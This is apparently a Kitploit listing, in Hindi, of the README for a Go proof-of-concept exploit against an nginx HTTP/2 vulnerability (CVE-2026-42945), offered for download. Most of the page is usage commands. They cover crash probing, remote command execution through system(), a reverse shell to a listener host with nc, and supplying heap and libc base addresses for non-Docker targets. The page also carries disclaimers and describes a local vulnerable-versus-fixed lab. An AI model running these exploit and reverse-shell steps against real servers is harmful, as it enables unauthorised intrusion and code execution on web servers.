Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-42945 — Go-आधारित PoC टूल CVE-2026-42945 (nginx HTTP/2) के लिए, जिसमें अधिकृत वातावरणों में डिटेक्शन, क्रैश प्रोबिंग, कमांड निष्पादन और रिवर्स शेल क्षमताएं शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/redcrazyghost/cve-2026-42945
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubredcrazyghost/cve-2026-42945

CVE-2026-42945

Go-आधारित PoC टूल CVE-2026-42945 (nginx HTTP/2) के लिए, जिसमें अधिकृत वातावरणों में डिटेक्शन, क्रैश प्रोबिंग, कमांड निष्पादन और रिवर्स शेल क्षमताएं शामिल हैं।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-42945 PoC(Go)

चीनी | English

nginx HTTP/2 कार्यान्वयन (CVE-2026-42945) के लिए जांच एवं उपयोग सहायक उपकरण, जिसका उपयोग अधिकृत वातावरण में भेद्यता की उपस्थिति सत्यापित करने, सुधार प्रभाव की तुलना करने, और नियंत्रित प्रायोगिक वातावरण में PoC व्यवहार को पुनः उत्पन्न करने के लिए किया जाता है।

प्रभावित संस्करण (मोटा अनुमान): nginx 0.6.27 – 1.30.0; 1.30.1+ / 1.31.0+ पहले ही ठीक कर दिया गया है।


⚠️ अस्वीकरण (कृपया पढ़ें)

यह रिपॉजिटरी केवल सुरक्षा अनुसंधान, भेद्यता सत्यापन और रक्षात्मक परीक्षण के लिए है।

  1. कानूनी प्राधिकरण: आप इस उपकरण का उपयोग केवल उन प्रणालियों पर कर सकते हैं जिनके लिए आपके पास स्पष्ट लिखित प्राधिकरण है या जो पूरी तरह से आपकी हैं। बिना अधिकार के दूसरों के नेटवर्क/सर्वर को स्कैन करना, जांच करना या हमला करना अवैध है। लेखक और योगदानकर्ता कोई कानूनी जिम्मेदारी नहीं लेते।
  2. जोखिम आपका: उपयोग प्रक्रिया के दौरान लक्ष्य सेवा के वर्कर क्रैश, व्यवधान या डेटा क्षति हो सकती है। आपको स्वयं प्रभाव का मूल्यांकन करना होगा और पृथक वातावरण में पहले सत्यापित करना होगा।
  3. कोई वारंटी नहीं: यह उपकरण "जैसा है" प्रदान किया गया है, गारंटी नहीं कि किसी वास्तविक उत्पादन वातावरण में सफलतापूर्वक उपयोग होगा; साइड-चैनल परिणाम RCE प्राप्त करने के समान नहीं हैं, फ़ाइल ड्रॉप, कमांड इको या रिवर्स शेल के माध्यम से स्वतंत्र रूप से सत्यापित किया जाना चाहिए।
  4. दुरुपयोग प्रतिबंधित: इस उपकरण का उपयोग अनधिकृत प्रणालियों में घुसपैठ, रैनसमवेयर, विनाश, माइनिंग या किसी भी अवैध उद्देश्य के लिए निषिद्ध है। डाउनलोड, कंपाइल या उपयोग का अर्थ है कि आपने इस अस्वीकरण को पढ़ा और सहमत हैं।
  5. NGINX से कोई संबंध नहीं: यह परियोजना स्वतंत्र अनुसंधान कार्यान्वयन है, NGINX आधिकारिक या किसी भी विक्रेता के दृष्टिकोण का प्रतिनिधित्व नहीं करती है।

यदि आप उपरोक्त शर्तों को स्वीकार नहीं करते हैं, तो कृपया तुरंत उपयोग बंद करें और इस रिपॉजिटरी को हटा दें।


कार्यक्षमता अवलोकन


पर्यावरण आवश्यकताएँ

  • Go ≥ 1.26 (go.mod देखें)
  • वैकल्पिक: Docker + docker compose (स्थानीय प्रयोगात्मक वातावरण)
  • वैकल्पिक: make, golangci-lint (विकास/कोड जांच)
  • उपयोग सत्यापन: लक्ष्य को PoC आवश्यक एंडपॉइंट (GET /api/, POST /spray आदि) प्रकट करना चाहिए; Docker प्रयोगात्मक इमेज में पहले से निर्मित है

सीमाएँ और लागू वातावरण


निर्माण

root@kitploit:~
# त्वरित निर्माण (आउटपुट bin/ में, .gitignore द्वारा अनदेखा)
make build-cmd

# या सीधे go का उपयोग करें
go build -o ./bin/cve-2026-42945 ./cmd

# एम्बेडेड संस्करण देखें
./bin/cve-2026-42945 -version

रिलीज़ बाइनरी: रिलीज़ से संबंधित प्लेटफ़ॉर्म के लिए cve-2026-42945-<os>-<arch> डाउनलोड करें (v* टैग पुश करने पर GitHub Actions द्वारा स्वचालित रूप से निर्मित)।


उपयोग गाइड

कमांड लाइन पैरामीटर

root@kitploit:~
-target string      लक्ष्य IP/होस्टनाम (डिफ़ॉल्ट 127.0.0.1)
-port int           लक्ष्य पोर्ट (0=80; Docker भेद्यता संस्करण अक्सर 19321)
-docker             स्थानीय Docker प्रयोगात्मक वातावरण का परीक्षण (vuln:19321, fixed:19331)
-check-only         केवल जांच, exploit ट्रैफ़िक न भेजें
-probe-crash        ओवरफ्लो जांच + worker क्रैश साइड-चैनल
-cmd string         system() के माध्यम से निष्पादित कमांड
-shell              रिवर्स शेल (-lhost आवश्यक)
-lhost string       रिवर्स शेल होस्ट IP
-lport int          रिवर्स शेल होस्ट पोर्ट (डिफ़ॉल्ट 4444)
-docker-profile     deploy/docker से वास्तविक ढेर/libc आधार का उपयोग करें
-heap-base string   ढेर आधार (हेक्साडेसिमल, जैसे 0x555555659000)
-libc-base string   libc आधार (हेक्साडेसिमल)
-tries int          प्रति ढेर उम्मीदवार प्रयासों की संख्या (डिफ़ॉल्ट 10)
-timeout int        एकल HTTP टाइमआउट सेकंड (डिफ़ॉल्ट 5)
-v                  विस्तृत आउटपुट
-version            संस्करण दिखाएँ और बाहर निकलें

-docker मोड को -cmd / -shell के साथ एक साथ उपयोग नहीं किया जा सकता; एकल लक्ष्य उपयोग के लिए -port 19321 निर्दिष्ट करें।

1. केवल लक्ष्य जांच

root@kitploit:~
./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only

2. क्रैश साइड-चैनल (एकल लक्ष्य)

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -probe-crash -v

3. Docker प्रयोगात्मक वातावरण तुलना

पहले प्रयोगात्मक कंटेनर प्रारंभ करें:

root@kitploit:~
make docker-up
# या
docker compose -f deploy/docker-compose.yml up -d --build

पहली बार निर्माण में nginx कंपाइल करने में कुछ मिनट लग सकते हैं; docker compose ps में सेवा healthy दिखाने के बाद make test-lab चलाएँ।

सेवापोर्टविवरण
vuln19321nginx 1.30.0 (प्रभावित)
fixed19331nginx 1.30.1 (ठीक)

बैच जांच:

root@kitploit:~
./bin/cve-2026-42945 -docker -check-only
./bin/cve-2026-42945 -docker -probe-crash

या Makefile शॉर्टकट का उपयोग करें:

root@kitploit:~
make test-lab          # check + probe
make cmd-exploit       # vuln पर /tmp/pwned लिखें और सत्यापन कमांड दिखाएँ

4. Docker vuln पर कमांड निष्पादित करें (RCE सत्यापन)

प्रयोगात्मक कंटेनर ASLR बंद (setarch -R) और -docker-profile के साथ पूर्व-निर्धारित आधार पते का उपयोग करने पर सबसे अधिक सफलता दर होती है:

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -docker-profile \
  -cmd 'echo pwned > /tmp/pwned' -v

# सत्यापित करें कि फ़ाइल लिखी गई है या नहीं
docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned

5. रिवर्स शेल

root@kitploit:~
# टर्मिनल 1: टूल प्रारंभ करें (पृष्ठभूमि में nc सुनने का प्रयास करेगा)
./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v

# यदि nc नहीं मिला, तो कृपया दूसरा टर्मिनल खोलकर मैन्युअल रूप से सुनें:
nc -lvnp 4444

6. कस्टम मेमोरी लेआउट

वास्तविक लक्ष्य ASLR, libc संस्करण Docker से भिन्न होने पर, आपको स्वयं आधार पते लीक या अनुमान करने होंगे:

root@kitploit:~
# लक्ष्य सादा HTTP पोर्ट होना चाहिए (TLS नहीं)
./bin/cve-2026-42945 -target TARGET -port 8080 \
  -heap-base 0x555555659000 \
  -libc-base 0x7ffff77ba000 \
  -cmd 'id' -tries 20 -v

परिणाम व्याख्या

  • [+] साइड-चैनल: worker असामान्य: केवल यह इंगित करता है कि worker ओवरफ्लो के कारण क्रैश हो सकता है, अकेले RCE सफलता का आधार नहीं।
  • द्वितीयक सत्यापन आवश्यक: कमांड साइड-इफेक्ट जांचें (फ़ाइलें, प्रक्रियाएँ, docker exec आदि)।
  • सामान्य विफलता कारण: ASLR चालू, libc/ढेर ऑफ़सेट गलत, PoC एंडपॉइंट अनुपलब्ध, WAF/दर सीमा, कंटेनर को पुनरारंभ की आवश्यकता।

परियोजना संरचना

root@kitploit:~
cmd/                 मुख्य प्रोग्राम प्रविष्टि
internal/rift/       जांच, लोड निर्माण और उपयोग तर्क
deploy/docker/       nginx 1.30.0 / 1.30.1 प्रयोगात्मक इमेज
deploy/docker-compose.yml
.github/workflows/   बहु-प्लेटफ़ॉर्म रिलीज़ निर्माण

विकास

root@kitploit:~
make help            # सभी make लक्ष्य देखें
make test            # यूनिट परीक्षण
make lint            # golangci-lint
make version         # वर्तमान निर्माण संस्करण दिखाएँ

नया संस्करण जारी करें:

root@kitploit:~
git tag v1.0.0
git push origin v1.0.0

संदर्भ

  • रिपॉजिटरी: https://github.com/RedCrazyGhost/CVE-2026-42945
  • CVE: CVE-2026-42945 (nginx HTTP/2 संबंधित भेद्यता, कृपया आधिकारिक घोषणा देखें)
  • लाइसेंस: MIT लाइसेंस
  • सुरक्षा मुद्दा: SECURITY.md

फिर से याद दिलाना

इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिन पर आपको परीक्षण करने का अधिकार है। किसी भी दुरुपयोग के लिए लेखक जिम्मेदार नहीं है।

टूल डाउनलोड करें
मोडविवरण
-check-onlyकनेक्टिविटी, सर्वर हेडर, संस्करण मोटा अनुमान, PoC एंडपॉइंट जांच
-probe-crashओवरफ्लो जांच भेजें, वर्कर क्रैश साइड-चैनल के माध्यम से निर्णय लें
-cmdएक्सप्लॉइट लोड तैयार करें, system() के माध्यम से निर्दिष्ट कमांड निष्पादित करें
-shellरिवर्स शेल (-lhost आवश्यक, होस्ट पर nc आवश्यक)
-dockerस्थानीय डॉकर प्रयोगात्मक वातावरण (vuln / fixed) का बैच परीक्षण
आइटमविवरण
प्रोटोकॉलकेवल सादा HTTP (net.Dial + कच्चे HTTP बाइट) समर्थित, HTTPS/TLS समर्थित नहीं। TLS पोर्ट जैसे -port 443 के लिए पहले TLS समाप्ति की आवश्यकता है या HTTP पोर्ट का उपयोग करें।
Docker प्रयोगइमेज linux/amd64 है, पहली बार docker compose build में nginx को स्रोत से कंपाइल करने में समय लगता है; कंटेनर में setarch -R का उपयोग कर ASLR बंद है, जो उत्पादन वातावरण से भिन्न है।
Apple Siliconस्थानीय Docker platform: linux/amd64 के माध्यम से अनुकरण करता है, धीमा।
रिवर्स शेल-shell सिस्टम nc पर निर्भर करता है, Windows पर मैन्युअल रूप से सुनने का सुझाव दिया जाता है।
उपयोग निर्णयसाइड-चैनल (worker क्रैश) RCE के बराबर नहीं है, कमांड साइड-इफेक्ट स्वतंत्र रूप से सत्यापित करें।